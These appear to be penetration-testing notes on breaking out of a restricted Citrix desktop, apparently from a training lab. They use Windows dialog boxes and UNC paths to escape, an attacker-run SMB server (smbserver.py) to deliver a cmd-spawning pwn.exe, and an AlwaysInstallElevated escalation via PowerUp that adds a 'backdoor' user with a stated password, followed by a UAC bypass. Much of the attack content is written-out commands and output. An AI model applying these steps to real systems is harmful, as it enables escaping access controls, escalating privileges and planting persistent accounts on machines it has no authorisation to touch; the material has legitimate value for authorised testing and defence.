Citrix Breakout
Install Citrix Receiver
Download Debian package
osboxes@osboxes:~/Downloads$ sudo chmod 644 icaclient_24.5.0.76_amd64.deb
osboxes@osboxes:~/Downloads$ sudo apt install -f ./icaclient_24.5.0.76_amd64.deb
If "Network data corrupted - HDX has detected corrupted server data, session can not continue":

Use an older Citrix receiver version:
$ wget https://deb.gymkirchenfeld.ch/pool/main/i/icaclient/icaclient_23.5.0.58_amd64.deb
$ sudo chmod 644 icaclient_23.5.0.58_amd64.deb
$ sudo dpkg -i /home/osboxes/Downloads/icaclient_23.5.0.58_amd64.deb
Breakout
Features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, and Print, usually provide an attacker with an opportunity to invoke a Windows dialog box. There are multiple ways to open dialog box in windows using tools such as Paint, Notepad, Wordpad, etc.
With Paint
Run Paint
from start menu and click on File > Open
to open the Dialog Box.

With the windows dialog box open for paint, we can enter the UNC path \\127.0.0.1\c$\users\pmorgan
under the File name field, with File-Type set to All Files
and upon hitting enter we gain access to the desired directory.
Create .bat file
Accessing SMB share from restricted environment
smbserver.py -smb2support share $(pwd)


Right-click on the pwn.exe
binary and select Open
, which should prompt us to run it and a cmd console will be opened.
pwn.exe:
#include <stdlib.h>
int main() {
system("C:\\Windows\\System32\\cmd.exe");
}
Explorer++
to copy files from the \\10.13.38.95\share
location to the Desktop belonging to the user pmorgan
.
Being a portable application, it can be executed directly without the need for installation
Alternate Registry Editors
Alternative Registry editors can be employed to bypass the standard group policy restrictions. Simpleregedit, Uberregedit and SmallRegistryEditor are examples of such GUI tools
Modify existing shortcut file
C:\Windows\System32\cmd.exe

Other options: transfer an existing shortcut file using an SMB server. Alternatively, we can create a new shortcut file using PowerShell
Script Execution
Create a new text file and name it "evil.bat".
Open "evil.bat" with a text editor such as Notepad.
Input the command "cmd" into the file.

Escalating Privileges
WinPeas or PowerUp -> AlwaysInstallElevated
Miscellaneous TechniquesC:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1
PS C:\Users\pmorgan\Desktop> Write-UserAddMSI
Output Path
-----------
UserAdd.msi

C:\> runas /user:backdoor cmd
Enter the password for backdoor: T3st@123
Attempting to start cmd as user "VDESKTOP3\backdoor" ...
Bypass UAC
C:\Windows\system32> cd C:\Users\Administrator
Access is denied.
PS C:\Users\Public> Import-Module .\Bypass-UAC.ps1
PS C:\Users\Public> Bypass-UAC -Method UacMethodSysprep

Last updated